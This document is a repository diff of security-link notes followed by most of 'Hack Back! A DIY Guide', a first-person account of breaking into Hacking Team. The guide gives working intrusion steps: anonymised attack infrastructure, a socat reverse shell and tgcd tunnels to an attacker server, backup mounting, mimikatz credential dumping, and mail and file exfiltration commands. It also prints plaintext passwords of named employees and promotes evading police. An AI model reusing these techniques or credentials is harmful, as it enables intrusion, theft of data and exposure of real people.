* [Part 2](https://www.youtube.com/watch?v=V-GYPp-j-lE) | |||
http://www.legbacore.com/Research.html | |||
** | |||
Decode Shellcode from cli: cat shellcode | rasm2 -d - | |||
** | |||
cachecrew.com/fixing-an-infected-php-web-server/ | |||
https://www.reddit.com/r/lowlevel/comments/30toah/advices_for_a_bootloader/ | |||
https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet | |||
https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet | |||
********* | |||
General Section? | |||
******** | |||
[The foundation is rotting and the basement is flooding: A deeper look at the implicit trust relationships in your organization](https://www.youtube.com/watch?v=nL64uj9Xm24) | |||
******** | |||
https://mobilesecuritywiki.com/ | |||
http://seclists.org/fulldisclosure/2015/Mar/67 | |||
http://www.lexsi-leblog.com/cert-en/qemu-gdb-pe-imports.html | |||
https://en.wikipedia.org/wiki/Homomorphic_encryption | |||
MS Assessment Deployment Toolkit - Measure boot times among other things | |||
seclists.org/fulldisclosure/2015/Mar/90 | |||
http://ytliu.info/blog/2014/05/31/blind-return-oriented-programming-brop-attack-yi/ | |||
https://www.segger.com/jlink-debug-probes.html | |||
http://www.atmel.com/tools/rzusbstick.aspx | |||
http://store.atmel.com/PartDetail.aspx?q=p:10500060#tc:description | |||
appleexaminer.com | |||
https://the.bytecode.club/ | |||
http://waleedassar.blogspot.com/ | |||
https://github.com/isislab/Project-Ideas/wiki/Program-Analysis | |||
https://github.com/isislab/Project-Ideas/wiki/Embedded-Device-Security | |||
https://github.com/isislab/Project-Ideas/wiki/Application-Security | |||
http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607 | |||
[List of hacker sites](http://link-base.org/) | |||
https://github.com/iagox86/dnscat2/tree/v0.01 | |||
http://opensecuritytraining.info/MalwareDynamicAnalysis_files/MalwareDynamicAnalysis02.pdf | |||
http://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-cactuscon-on-april-4-2014 | |||
http://www.panelguides.com/index.php?option=com_jdownloads&Itemid=13 | |||
http://cs.gmu.edu/~astavrou/research/PyTrigger_ARES2013.pdf | |||
http://www.myopenrouter.com/article/10917/Port-Mirroring-Span-Port-Monitor-Port-with-iptables-on-NETGEAR-WGR614L/ | |||
http://netdude.sourceforge.net/ | |||
Cull the interesting papers | |||
http://www.covert.io/ | |||
http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/ | |||
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications. | |||
http://siis.cse.psu.edu/ | |||
http://c7zero.info/ | |||
Lookat http://www.cl.cam.ac.uk/~sps32/PartII_030214.pdf | |||
Check under research section | |||
http://www.cl.cam.ac.uk/~sps32/ | |||
Go through | |||
https://santoku-linux.com/howtos | |||
Compare resources against what power-view can grab | |||
Compare against sysmon service for scaling, setting it as service with scripting | |||
http://www.codeproject.com/Articles/36907/How-to-develop-your-own-Boot-Loader | |||
http://0xdabbad00.com/2013/09/02/file-scanner-web-app-part-1-of-5-stand-up-and-webserver/ | |||
https://addons.mozilla.org/en-US/firefox/addon/ssleuth/ |
@ -0,0 +1,14 @@ | |||
##Game Hacking | |||
Pince - https://github.com/korcankaraokcu/PINCE | |||
PINCE is a gdb front-end/reverse engineering tool focused on games, but it can be used for any reverse-engineering related stuff. PINCE is an abbreviation for "PINCE is not Cheat Engine". PINCE's GUI is heavily "inspired(;D)" by Cheat Engine. | |||
https://gbatemp.net/threads/arm9loader-technical-details-and-discussion.408537/ | |||
[The Multibillion Dollar Industry That's Ignored](http://www.irongeek.com/i.php?page=videos/derbycon4/t204-the-multibillion-dollar-industry-thats-ignored-jason-montgomery-and-ryan-sevey |
@ -0,0 +1,926 @@ | |||
_ _ _ ____ _ _ | |||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |||
| _ | (_| | (__| < | |_) | (_| | (__| <|_| | |||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |||
A DIY Guide | |||
,-._,-._ | |||
_,-\ o O_/; | |||
/ , ` `| | |||
| \-.,___, / ` | |||
\ `-.__/ / ,.\ | |||
/ `-.__.-\` ./ \' | |||
/ /| ___\ ,/ `\ | |||
( ( |.-"` '/\ \ ` | |||
\ \/ ,, | \ _ | |||
\| o/o / \. | |||
\ , / / | |||
( __`;-;'__`) \\ | |||
`//'` `||` `\ | |||
_// || __ _ _ _____ __ | |||
.-"-._,(__) .(__).-""-. | | | | |_ _| | | |||
/ \ / \ | | |_| | | | | | |||
\ / \ / | | _ | | | | | |||
`'-------` `--------'` __| |_| |_| |_| |__ | |||
#antisec | |||
--[ 1 - Introduction ]---------------------------------------------------------- | |||
You'll notice the change in language since the last edition [1]. The | |||
English-speaking world already has tons of books, talks, guides, and | |||
info about hacking. In that world, there's plenty of hackers better than me, | |||
but they misuse their talents working for "defense" contractors, for intelligence | |||
agencies, to protect banks and corporations, and to defend the status quo. | |||
Hacker culture was born in the US as a counterculture, but that origin only | |||
remains in its aesthetics - the rest has been assimilated. At least they can | |||
wear a t-shirt, dye their hair blue, use their hacker names, and feel like | |||
rebels while they work for the Man. | |||
You used to have to sneak into offices to leak documents [2]. You used to need | |||
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. | |||
Like the CNT said after the Gamma Group hack: "Let's take a step forward with | |||
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! | |||
[1] http://pastebin.com/raw.php?i=cRYvK4jb | |||
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI | |||
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html | |||
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf | |||
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group | |||
--[ 2 - Hacking Team ]---------------------------------------------------------- | |||
Hacking Team was a company that helped governments hack and spy on | |||
journalists, activists, political opposition, and other threats to their power | |||
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals | |||
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the | |||
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende | |||
RCS". They also claimed to have technology to solve the "problem" posed by Tor | |||
and the darknet [13]. But seeing as I'm still free, I have my doubts about | |||
its effectiveness. | |||
[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/ | |||
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html | |||
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/ | |||
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/ | |||
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/ | |||
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/ | |||
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/ | |||
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal | |||
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/ | |||
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/ | |||
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/ | |||
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html | |||
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web | |||
--[ 3 - Stay safe out there ]--------------------------------------------------- | |||
Unfortunately, our world is backwards. You get rich by doing bad things and go | |||
to jail for doing good. Fortunately, thanks to the hard work of people like | |||
the Tor project [1], you can avoid going to jail by taking a few simple | |||
precautions: | |||
1) Encrypt your hard disk [2] | |||
I guess when the police arrive to seize your computer, it means you've | |||
already made a lot of mistakes, but it's better to be safe. | |||
2) Use a virtual machine with all traffic routed through Tor | |||
This accomplishes two things. First, all your traffic is anonymized through | |||
Tor. Second, keeping your personal life and your hacking on separate | |||
computers helps you not to mix them by accident. | |||
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or | |||
something custom [6]. Here's [7] a detailed comparison. | |||
3) (Optional) Don't connect directly to Tor | |||
Tor isn't a panacea. They can correlate the times you're connected to Tor | |||
with the times your hacker handle is active. Also, there have been | |||
successful attacks against Tor [8]. You can connect to Tor using other | |||
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for | |||
cracking wifi. Another option is to connect to a VPN or a bridge node [10] | |||
before Tor, but that's less secure because they can still correlate the | |||
hacker's activity with your house's internet activity (this was used as | |||
evidence against Jeremy Hammond [11]). | |||
The reality is that while Tor isn't perfect, it works quite well. When I | |||
was young and reckless, I did plenty of stuff without any protection (I'm | |||
referring to hacking) apart from Tor, that the police tried their hardest | |||
to investigate, and I've never had any problems. | |||
[1] https://www.torproject.org/ | |||
[2] https://info.securityinabox.org/es/chapter-4 | |||
[3] https://www.whonix.org/ | |||
[4] https://tails.boum.org/ | |||
[5] https://www.qubes-os.org/doc/privacy/torvm/ | |||
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy | |||
[7] https://www.whonix.org/wiki/Comparison_with_Others | |||
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/ | |||
[9] http://www.wifislax.com/ | |||
[10] https://www.torproject.org/docs/bridges.html.en | |||
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html | |||
----[ 3.1 - Infrastructure ]---------------------------------------------------- | |||
I don't hack directly from Tor exit nodes. They're on blacklists, they're | |||
slow, and they can't receive connect-backs. Tor protects my anonymity while I | |||
connect to the infrastructure I use to hack, which consists of: | |||
1) Domain Names | |||
For C&C addresses, and for DNS tunnels for guaranteed egress. | |||
2) Stable Servers | |||
For use as C&C servers, to receive connect-back shells, to launch attacks, | |||
and to store the loot. | |||
3) Hacked Servers | |||
For use as pivots to hide the IP addresses of the stable servers. And for | |||
when I want a fast connection without pivoting, for example to scan ports, | |||
scan the whole internet, download a database with sqli, etc. | |||
Obviously, you have to use an anonymous payment method, like bitcoin (if it's | |||
used carefully). | |||
----[ 3.2 - Attribution ]------------------------------------------------------- | |||
In the news we often see attacks traced back to government-backed hacking | |||
groups ("APTs"), because they repeatedly use the same tools, leave the same | |||
footprints, and even use the same infrastructure (domains, emails, etc). | |||
They're negligent because they can hack without legal consequences. | |||
I didn't want to make the police's work any easier by relating my hack of | |||
Hacking Team with other hacks I've done or with names I use in my day-to-day | |||
work as a blackhat hacker. So, I used new servers and domain names, registered | |||
with new emails, and payed for with new bitcoin addresses. Also, I only used | |||
tools that are publicly available, or things that I wrote specifically for | |||
this attack, and I changed my way of doing some things to not leave my usual | |||
forensic footprint. | |||
--[ 4 - Information Gathering ]------------------------------------------------- | |||
Although it can be tedious, this stage is very important, since the larger the | |||
attack surface, the easier it is to find a hole somewhere in it. | |||
----[ 4.1 - Technical Information ]--------------------------------------------- | |||
Some tools and techniques are: | |||
1) Google | |||
A lot of interesting things can be found with a few well-chosen search | |||
queries. For example, the identity of DPR [1]. The bible of Google hacking | |||
is the book "Google Hacking for Penetration Testers". You can find a short | |||
summary in Spanish at [2]. | |||
2) Subdomain Enumeration | |||
Often, a company's main website is hosted by a third party, and you'll find | |||
the company's actual IP range thanks to subdomains like mx.company.com or | |||
ns1.company.com. Also, sometimes there are things that shouldn't be exposed | |||
in "hidden" subdomains. Useful tools for discovering domains and subdomains | |||
are fierce [3], theHarvester [4], and recon-ng [5]. | |||
3) Whois lookups and reverse lookups | |||
With a reverse lookup using the whois information from a domain or IP range | |||
of a company, you can find other domains and IP ranges. As far as I know, | |||
there's no free way to do reverse lookups aside from a google "hack": | |||
"via della moscova 13" site:www.findip-address.com | |||
"via della moscova 13" site:domaintools.com | |||
4) Port scanning and fingerprinting | |||
Unlike the other techniques, this talks to the company's servers. I | |||
include it in this section because it's not an attack, it's just | |||
information gathering. The company's IDS might generate an alert, but you | |||
don't have to worry since the whole internet is being scanned constantly. | |||
For scanning, nmap [6] is precise, and can fingerprint the majority of | |||
services discovered. For companies with very large IP ranges, zmap [7] or | |||
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web | |||
sites. | |||
[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html | |||
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf | |||
[3] http://ha.ckers.org/fierce/ | |||
[4] https://github.com/laramies/theHarvester | |||
[5] https://bitbucket.org/LaNMaSteR53/recon-ng | |||
[6] https://nmap.org/ | |||
[7] https://zmap.io/ | |||
[8] https://github.com/robertdavidgraham/masscan | |||
[9] http://www.morningstarsecurity.com/research/whatweb | |||
[10] http://blindelephant.sourceforge.net/ | |||
----[ 4.2 - Social Information ]------------------------------------------------ | |||
For social engineering, it's useful to have information about the employees, | |||
their roles, contact information, operating system, browser, plugins, | |||
software, etc. Some resources are: | |||
1) Google | |||
Here as well, it's the most useful tool. | |||
2) theHarvester and recon-ng | |||
I already mentioned them in the previous section, but they have a lot more | |||
functionality. They can find a lot of information quickly and | |||
automatically. It's worth reading all their documentation. | |||
3) LinkedIn | |||
A lot of information about the employees can be found here. The company's | |||
recruiters are the most likely to accept your connection requests. | |||
4) Data.com | |||
Previously known as jigsaw. They have contact information for many | |||
employees. | |||
5) File Metadata | |||
A lot of information about employees and their systems can be found in | |||
metadata of files the company has published. Useful tools for finding | |||
files on the company's website and extracting the metadata are metagoofil | |||
[1] and FOCA [2]. | |||
[1] https://github.com/laramies/metagoofil | |||
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html | |||
--[ 5 - Entering the network ]-------------------------------------------------- | |||
There are various ways to get a foothold. Since the method I used against | |||
Hacking Team is uncommon and a lot more work than is usually necessary, I'll | |||
talk a little about the two most common ways, which I recommend trying first. | |||
----[ 5.1 - Social Engineering ]------------------------------------------------ | |||
Social engineering, specifically spear phishing, is responsible for the | |||
majority of hacks these days. For an introduction in Spanish, see [1]. For | |||
more information in English, see [2] (the third part, "Targeted Attacks"). For | |||
fun stories about the social engineering exploits of past generations, see | |||
[3]. I didn't want to try to spear phish Hacking Team, as their whole business | |||
is helping governments spear phish their opponents, so they'd be much more | |||
likely to recognize and investigate a spear phishing attempt. | |||
[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html | |||
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ | |||
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf | |||
----[ 5.2 - Buying Access ]----------------------------------------------------- | |||
Thanks to hardworking Russians and their exploit kits, traffic sellers, and | |||
bot herders, many companies already have compromised computers in their | |||
networks. Almost all of the Fortune 500, with their huge networks, have some | |||
bots already inside. However, Hacking Team is a very small company, and most | |||
of it's employees are infosec experts, so there was a low chance that they'd | |||
already been compromised. | |||
----[ 5.3 - Technical Exploitation ]-------------------------------------------- | |||
After the Gamma Group hack, I described a process for searching for | |||
vulnerabilities [1]. Hacking Team had one public IP range: | |||
inetnum: 93.62.139.32 - 93.62.139.47 | |||
descr: HT public subnet | |||
Hacking Team had very little exposed to the internet. For example, unlike | |||
Gamma Group, their customer support site needed a client certificate to | |||
connect. What they had was their main website (a Joomla blog in which Joomscan | |||
[2] didn't find anything serious), a mail server, a couple routers, two VPN | |||
appliances, and a spam filtering appliance. So, I had three options: look for | |||
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the | |||
embedded devices. A 0day in an embedded device seemed like the easiest option, | |||
and after two weeks of work reverse engineering, I got a remote root exploit. | |||
Since the vulnerabilities still haven't been patched, I won't give more | |||
details, but for more information on finding these kinds of vulnerabilities, | |||
see [3] and [4]. | |||
[1] http://pastebin.com/raw.php?i=cRYvK4jb | |||
[2] http://sourceforge.net/projects/joomscan/ | |||
[3] http://www.devttys0.com/ | |||
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A | |||
--[ 6 - Be Prepared ]----------------------------------------------------------- | |||
I did a lot of work and testing before using the exploit against Hacking Team. | |||
I wrote a backdoored firmware, and compiled various post-exploitation tools | |||
for the embedded device. The backdoor serves to protect the exploit. Using the | |||
exploit just once and then returning through the backdoor makes it harder to | |||
identify and patch the vulnerabilities. | |||
The post-exploitation tools that I'd prepared were: | |||
1) busybox | |||
For all the standard Unix utilities that the system didn't have. | |||
2) nmap | |||
To scan and fingerprint Hacking Team's internal network. | |||
3) Responder.py | |||
The most useful tool for attacking windows networks when you have access to | |||
the internal network, but no domain user. | |||
4) Python | |||
To execute Responder.py | |||
5) tcpdump | |||
For sniffing traffic. | |||
6) dsniff | |||
For sniffing passwords from plaintext protocols like ftp, and for | |||
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR | |||
and NaGA, but it was hard to compile it for the system. | |||
7) socat | |||
For a comfortable shell with a pty: | |||
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port | |||
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ | |||
tcp:my_server:my_port | |||
And useful for a lot more, it's a networking swiss army knife. See the | |||
examples section of its documentation. | |||
8) screen | |||
Like the shell with pty, it wasn't really necessary, but I wanted to feel | |||
at home in Hacking Team's network. | |||
9) a SOCKS proxy server | |||
To use with proxychains to be able to access their local network from any | |||
program. | |||
10) tgcd | |||
For forwarding ports, like for the SOCKS server, through the firewall. | |||
[1] https://www.busybox.net/ | |||
[2] https://nmap.org/ | |||
[3] https://github.com/SpiderLabs/Responder | |||
[4] https://github.com/bendmorris/static-python | |||
[5] http://www.tcpdump.org/ | |||
[6] http://www.monkey.org/~dugsong/dsniff/ | |||
[7] http://www.dest-unreach.org/socat/ | |||
[8] https://www.gnu.org/software/screen/ | |||
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html | |||
[10] http://tgcd.sourceforge.net/ | |||
The worst thing that could happen would be for my backdoor or post-exploitation | |||
tools to make the system unstable and cause an employee to investigate. So I | |||
spent a week testing my exploit, backdoor, and post-exploitation tools in the | |||
networks of other vulnerable companies before entering Hacking Team's network. | |||
--[ 7 - Watch and Listen ]------------------------------------------------------ | |||
Now inside their internal network, I wanted to take a look around and think | |||
about my next step. I started Responder.py in analysis mode (-A to listen | |||
without sending poisoned responses), and did a slow scan with nmap. | |||
--[ 8 - NoSQL Databases ]------------------------------------------------------- | |||
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker | |||
community [1]. Just when I was worried that they'd finally patched all of the | |||
authentication bypass bugs in MySQL [2][3][4][5], new databases came into | |||
style that lack authentication by design. Nmap found a few in Hacking Team's | |||
internal network: | |||
27017/tcp open mongodb MongoDB 2.6.5 | |||
| mongodb-databases: | |||
| ok = 1 | |||
| totalSizeMb = 47547 | |||
| totalSize = 49856643072 | |||
... | |||
|_ version = 2.6.5 | |||
27017/tcp open mongodb MongoDB 2.6.5 | |||
| mongodb-databases: | |||
| ok = 1 | |||
| totalSizeMb = 31987 | |||
| totalSize = 33540800512 | |||
| databases | |||
... | |||
|_ version = 2.6.5 | |||
They were the databases for test instances of RCS. The audio that RCS records | |||
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came | |||
from this. They were spying on themselves without meaning to. | |||
[1] https://www.shodan.io/search?query=product%3Amongodb | |||
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql | |||
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html | |||
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c | |||
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html | |||
[6] https://ht.transparencytoolkit.org/audio/ | |||
--[ 9 - Crossed Cables ]-------------------------------------------------------- | |||
Although it was fun to listen to recordings and see webcam images of Hacking | |||
Team developing their malware, it wasn't very useful. Their insecure backups | |||
were the vulnerability that opened their doors. According to their | |||
documentation [1], their iSCSI devices were supposed to be on a separate | |||
network, but nmap found a few in their subnetwork 192.168.1.200/24: | |||
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) | |||
... | |||
3260/tcp open iscsi? | |||
| iscsi-info: | |||
| Target: iqn.2000-01.com.synology:ht-synology.name | |||
| Address: 192.168.200.66:3260,0 | |||
|_ Authentication: No authentication required | |||
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) | |||
... | |||
3260/tcp open iscsi? | |||
| iscsi-info: | |||
| Target: iqn.2000-01.com.synology:synology-backup.name | |||
| Address: 10.0.1.72:3260,0 | |||
| Address: 192.168.200.72:3260,0 | |||
|_ Authentication: No authentication required | |||
iSCSI needs a kernel module, and it would've been difficult to compile it for | |||
the embedded system. I forwarded the port so that I could mount it from a VPS: | |||
VPS: tgcd -L -p 3260 -q 42838 | |||
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838 | |||
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1 | |||
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it | |||
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1 | |||
The way I solved it was: | |||
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1 | |||
And now, after: | |||
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login | |||
...the device file appears! We mount it: | |||
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp | |||
and find backups of various virtual machines. The Exchange server seemed like | |||
the most interesting. It was too big too download, but it was possible to | |||
mount it remotely to look for interesting files: | |||
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk | |||
$ fdisk -l /dev/loop0 | |||
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT | |||
so the offset is 2048 * 512 = 1048576 | |||
$ losetup -o 1048576 /dev/loop1 /dev/loop0 | |||
$ mount -o ro /dev/loop1 /mnt/exchange/ | |||
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 | |||
we find the hard disk of the VM, and mount it: | |||
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ | |||
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1 | |||
...and finally we've unpacked the Russian doll and can see all the files from | |||
the old Exchange server in /mnt/part1 | |||
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf | |||
--[ 10 - From backups to domain admin ]----------------------------------------- | |||
What interested me most in the backup was seeing if it had a password or hash | |||
that could be used to access the live server. I used pwdump, cachedump, and | |||
lsadump [1] on the registry hives. lsadump found the password to the besadmin | |||
service account: | |||
_SC_BlackBerry MDS Connection Service | |||
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ | |||
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8. | |||
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!........... | |||
I used proxychains [2] with the socks server on the embedded device and | |||
smbclient [3] to check the password: | |||
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!' | |||
It worked! The password for besadmin was still valid, and a local admin. I | |||
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. | |||
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and | |||
got a bunch of passwords, including the Domain Admin: | |||
HACKINGTEAM BESAdmin bes32678!!! | |||
HACKINGTEAM Administrator uu8dd8ndd12! | |||
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin | |||
HACKINGTEAM m.romeo ioLK/(90 | |||
HACKINGTEAM l.guerra 4luc@=.= | |||
HACKINGTEAM d.martinez W4tudul3sp | |||
HACKINGTEAM g.russo GCBr0s0705! | |||
HACKINGTEAM a.scarafile Cd4432996111 | |||
HACKINGTEAM r.viscardi Ht2015! | |||
HACKINGTEAM a.mino A!e$$andra | |||
HACKINGTEAM m.bettini Ettore&Bella0314 | |||
HACKINGTEAM m.luppi Blackou7 | |||
HACKINGTEAM s.gallucci 1S9i8m4o! | |||
HACKINGTEAM d.milan set!dob66 | |||
HACKINGTEAM w.furlan Blu3.B3rry! | |||
HACKINGTEAM d.romualdi Rd13136f@# | |||
HACKINGTEAM l.invernizzi L0r3nz0123! | |||
HACKINGTEAM e.ciceri 2O2571&2E | |||
HACKINGTEAM e.rabe erab@4HT! | |||
[1] https://github.com/Neohapsis/creddump7 | |||
[2] http://proxychains.sourceforge.net/ | |||
[3] https://www.samba.org/ | |||
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf | |||
[5] https://github.com/gentilkiwi/mimikatz | |||
--[ 11 - Downloading the mail ]------------------------------------------------- | |||
With the Domain Admin password, I have access to the email, the heart of the | |||
company. Since with each step I take there's a chance of being detected, I | |||
start downloading their email before continuing to explore. Powershell makes | |||
it easy [1]. Curiously, I found a bug with Powershell's date handling. After | |||
downloading the emails, it took me another couple weeks to get access to the | |||
source code and everything else, so I returned every now and then to download | |||
the new emails. The server was Italian, with dates in the format | |||
day/month/year. I used: | |||
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} | |||
with New-MailboxExportRequest to download the new emails (in this case all | |||
mail since June 5). The problem is it says the date is invalid if you | |||
try a day larger than 12 (I imagine because in the US the month comes first | |||
and you can't have a month above 12). It seems like Microsoft's engineers only | |||
test their software with their own locale. | |||
[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ | |||
--[ 12 - Downloading Files ]---------------------------------------------------- | |||
Now that I'd gotten Domain Admin, I started to download file shares using my | |||
proxy and the -Tc option of smbclient, for example: | |||
proxychains smbclient '//192.168.1.230/FAE DiskStation' \ | |||
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' | |||
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in | |||
the torrent like that. | |||
--[ 13 - Introduction to hacking windows domains ]------------------------------ | |||
Before continuing with the story of the "weones culiaos" (Hacking Team), I | |||
should give some general knowledge for hacking windows networks. | |||
----[ 13.1 - Lateral Movement ]------------------------------------------------- | |||
I'll give a brief review of the different techniques for spreading withing a | |||
windows network. The techniques for remote execution require the password or | |||
hash of a local admin on the target. By far, the most common way of obtaining | |||
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords | |||
and sekurlsa::msv, on the computers where you already have admin access. The | |||
techniques for "in place" movement also require administrative privileges | |||
(except for runas). The most important tools for privilege escalation are | |||
PowerUp [2], and bypassuac [3]. | |||
[1] https://adsecurity.org/?page_id=1821 | |||
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp | |||
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 | |||
Remote Movement: | |||
1) psexec | |||
The tried and true method for lateral movement on windows. You can use | |||
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's | |||
invoke_psexec [4], or the builtin windows command "sc" [5]. For the | |||
metasploit module, powershell empire, and pth-winexe [6], you just need the | |||
hash, not the password. It's the most universal method (it works on any | |||
windows computer with port 445 open), but it's also the least stealthy. | |||
Event type 7045 "Service Control Manager" will appear in the event logs. In | |||
my experience, no one has ever noticed during a hack, but it helps the | |||
investigators piece together what the hacker did afterwards. | |||
2) WMI | |||
The most stealthy method. The WMI service is enabled on all windows | |||
computers, but except for servers, the firewall blocks it by default. You | |||
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and | |||
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin | |||
wmic [5]. All except wmic just need the hash. | |||
3) PSRemoting [10] | |||
It's disabled by default, and I don't recommend enabling new protocols. | |||
But, if the sysadmin has already enabled it, it's very convenient, | |||
especially if you use powershell for everything (and you should use | |||
powershell for almost everything, it will change [11] with powershell 5 and | |||
windows 10, but for now powershell makes it easy to do everything in RAM, | |||
avoid AV, and leave a small footprint) | |||
4) Scheduled Tasks | |||
You can execute remote programs with at and schtasks [5]. It works in the | |||
same situations where you could use psexec, and it also leaves a well known | |||
footprint [12]. | |||
5) GPO | |||
If all those protocols are disabled or blocked by the firewall, once you're | |||
Domain Admin, you can use GPO to give users a login script, install an msi, | |||
execute a scheduled task [13], or, like we'll see with the computer of | |||
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and | |||
open the firewall. | |||
[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx | |||
[2] https://sourceforge.net/projects/winexe/ | |||
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh | |||
[4] http://www.powershellempire.com/?page_id=523 | |||
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ | |||
[6] https://github.com/byt3bl33d3r/pth-toolkit | |||
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py | |||
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/ | |||
[9] http://www.powershellempire.com/?page_id=124 | |||
